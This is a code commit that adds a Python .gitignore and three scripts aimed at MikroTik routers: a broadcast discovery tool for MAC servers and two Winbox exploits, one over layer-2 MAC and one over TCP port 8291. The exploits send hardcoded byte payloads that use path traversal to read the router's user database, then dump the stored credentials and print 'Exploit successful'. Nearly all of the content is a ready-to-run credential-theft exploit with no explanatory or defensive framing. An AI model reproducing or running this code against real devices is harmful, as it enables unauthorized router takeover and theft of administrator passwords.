non modded version

Author: sinichi449

.gitignore

@@ -0,0 +1,104 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+.hypothesis/
+.pytest_cache/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# pyenv
+.python-version
+
+# celery beat schedule file
+celerybeat-schedule
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/

MACServerDiscover.py

@@ -0,0 +1,38 @@
+import socket, binascii, threading, time
+
+# MAC server discovery by BigNerd95
+
+search = True
+devices = []
+
+def discovery(sock):
+    global search
+    while search:
+        sock.sendto(b"\x00\x00\x00\x00", ("255.255.255.255", 5678))
+        time.sleep(1)
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+sock.bind(("0.0.0.0", 5678))
+
+threading.Thread(target=discovery, args=(sock,)).start()
+
+print("Looking for Mikrotik devices (MAC servers)\n")
+
+while search:
+    try:
+        data, addr = sock.recvfrom(1024)
+        if b"\x00\x01\x00\x06" in data:
+            start = data.index(b"\x00\x01\x00\x06") + 4
+            mac = data[start:start+6]
+            
+            if mac not in devices:
+                devices.append(mac)
+
+                #print(addr[0])
+                print('\t' + ':'.join('%02x' % b for b in mac))
+                print()
+    except KeyboardInterrupt:
+        search = False
+        break
+        

MACServerExploit.py

@@ -0,0 +1,166 @@
+import threading, socket, struct, time, sys, binascii
+from extract_user import dump
+
+# MAC server Winbox exploit by BigNerd95 (and mosajjal)
+
+a = bytearray([0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
+     0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
+     0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
+     0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
+     0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
+     0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
+     0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
+     0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
+     0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
+     0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
+     0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
+     0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
+     0x00, 0x00])
+
+b = bytearray([0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
+     0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
+     0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
+     0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
+     0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
+     0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
+     0x00, 0x02, 0x00, 0x00, 0x00])
+
+class MikrotikMACClient():
+
+    START = 0
+    DATA  = 1
+    ACK   = 2
+    END   = 255
+    PROTO_VERSION = 1
+    CLIENT_TYPE = 0x0F90
+    SESSION_ID = 0x1234
+    ADDR = ("255.255.255.255", 20561)
+    HEADLEN = 22
+    VERBOSE = False
+
+    def __init__(self, mac):
+        self.session_bytes_sent = 0
+        self.session_bytes_recv = 0
+        self.source_mac = b"\xff\xff\xff\xff\xff\xff" # put mac of your pc if mikrotik is not responding
+        self.dest_mac = mac
+        
+        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+        self.sock.bind(('', 0))
+
+        self.buffer = []
+        self.work = True
+        self.connected = False
+        self.rm = threading.Thread(target=self.__recv_manager__)
+        self.rm.start()
+
+        self.__send_init__()
+    
+    def __recv_manager__(self):
+        while self.work:
+            data, _ = self.sock.recvfrom(1024*64)
+            self.__parse_packet__(data)
+
+    def __buffer_pop__(self):
+        while not self.buffer and self.connected:
+            time.sleep(0.005)
+        return self.buffer.pop(0)
+            
+    def __parse_packet__(self, data):
+        _, packet_type = struct.unpack(">BB", data[:2])
+        session_id, _, session_bytes = struct.unpack(">HHI", data[14:self.HEADLEN])
+
+        if packet_type == self.DATA:
+            self.__print__("New DATA")
+            self.session_bytes_recv += len(data) - self.HEADLEN
+            self.__send_ack__()
+
+            self.buffer.append(data[self.HEADLEN:])
+            self.connected = True
+
+        elif packet_type == self.ACK:
+            self.__print__("New ACK")
+            self.connected = True
+            self.session_bytes_sent = session_bytes
+        elif packet_type == self.END:
+            self.__print__("End session")
+            self.connected = False
+            self.work = False
+            self.__send_ack__()
+        else:
+            self.__print__("Unknown packet")
+            self.__print__(data)
+
+        self.__print__("ID:", session_id, "Bytes:", session_bytes)
+        
+        if len(data) > self.HEADLEN:
+            self.__print__("Data:", data[self.HEADLEN:])
+
+        self.__print__()
+
+    def __send_ack__(self):
+        self.sock.sendto(self.__build_packet__(self.ACK), self.ADDR)
+
+    def __send_data__(self, data):
+        self.sock.sendto(self.__build_packet__(self.DATA, data), self.ADDR)
+
+    def __send_end__(self):
+        self.sock.sendto(self.__build_packet__(self.END), self.ADDR)
+
+    def __send_init__(self):
+        self.sock.sendto(self.__build_packet__(self.START), self.ADDR)
+        while not self.connected:
+            time.sleep(0.005)
+
+    def __build_packet__(self, packet_type, data=b""):
+        header = struct.pack(">BB",
+            self.PROTO_VERSION,
+            packet_type
+        )
+        header += self.source_mac
+        header += self.dest_mac
+        header += struct.pack(">HHI",
+            self.SESSION_ID,
+            self.CLIENT_TYPE,
+            self.session_bytes_sent if packet_type == self.DATA else self.session_bytes_recv
+        )
+        return header + data
+
+    def __print__(self, *msg):
+        if self.VERBOSE:
+            print(*msg)
+
+    def send(self, data):
+        self.__send_data__(data)
+
+    def recv(self, minlen=None, contains=None):
+        d = self.__buffer_pop__()
+
+        while (minlen and len(d) < minlen) or (contains and contains not in d):
+            d = self.__buffer_pop__()
+
+        return d
+
+    def close(self):
+        self.work = False
+        self.__send_end__()
+
+if __name__ == "__main__":
+    if len(sys.argv) > 1:
+        mac = binascii.unhexlify(sys.argv[1].replace(':', ''))
+
+        m = MikrotikMACClient(mac)
+
+        m.send(a)
+        b[19] = m.recv(minlen=39)[38] # set correct session id
+
+        m.send(b)
+        dump(m.recv(contains=b"\x11\x00\x00\x21"))
+        
+        m.close()
+        
+    else:
+        print("Usage: " + sys.argv[0] + " MAC_ADDRESS")
+    

WinboxExploit.py

@@ -0,0 +1,78 @@
+#!/usr/bin/env python3
+
+import socket
+import sys
+from extract_user import dump
+
+
+a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
+     0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
+     0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
+     0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
+     0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
+     0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
+     0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
+     0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
+     0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
+     0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
+     0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
+     0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
+     0x00, 0x00]
+
+b = [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
+     0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
+     0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
+     0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
+     0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
+     0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
+     0x00, 0x02, 0x00, 0x00, 0x00]
+
+
+
+if __name__ == "__main__":
+     if len(sys.argv) < 2 or (len(sys.argv) == 3 and not str.isdigit(sys.argv[2])) or len(sys.argv) > 3:
+         print("Usage: python3 WinboxExploit.py IP_ADDRESS [PORT]")
+         exit()
+
+     ip = sys.argv[1]
+     port = 8291
+     if len(sys.argv) == 3:
+         port = int(sys.argv[2])
+
+     #Initialize Socket
+     s = socket.socket()
+     s.settimeout(3)
+     try:
+         s.connect((ip, port))
+     except Exception as e:
+         print("Connection error: " + str(e))
+         exit()
+
+     #Convert to bytearray for manipulation
+     a = bytearray(a)
+     b = bytearray(b)
+
+     #Send hello and recieve the sesison id
+     s.send(a)
+     try:
+         d = bytearray(s.recv(1024))
+     except Exception as e:
+         print("Connection error: " + str(e))
+         exit()
+
+     #Replace the session id in template
+     b[19] = d[38]
+
+     #Send the edited response
+     s.send(b)
+     d = bytearray(s.recv(1024))
+
+     #Get results
+     print("Connected to " + ip + ":" + str(port))
+     if len(d[55:]) > 25:
+         print("Exploit successful")
+         dump(d[55:])
+     else:
+         print("Exploit failed")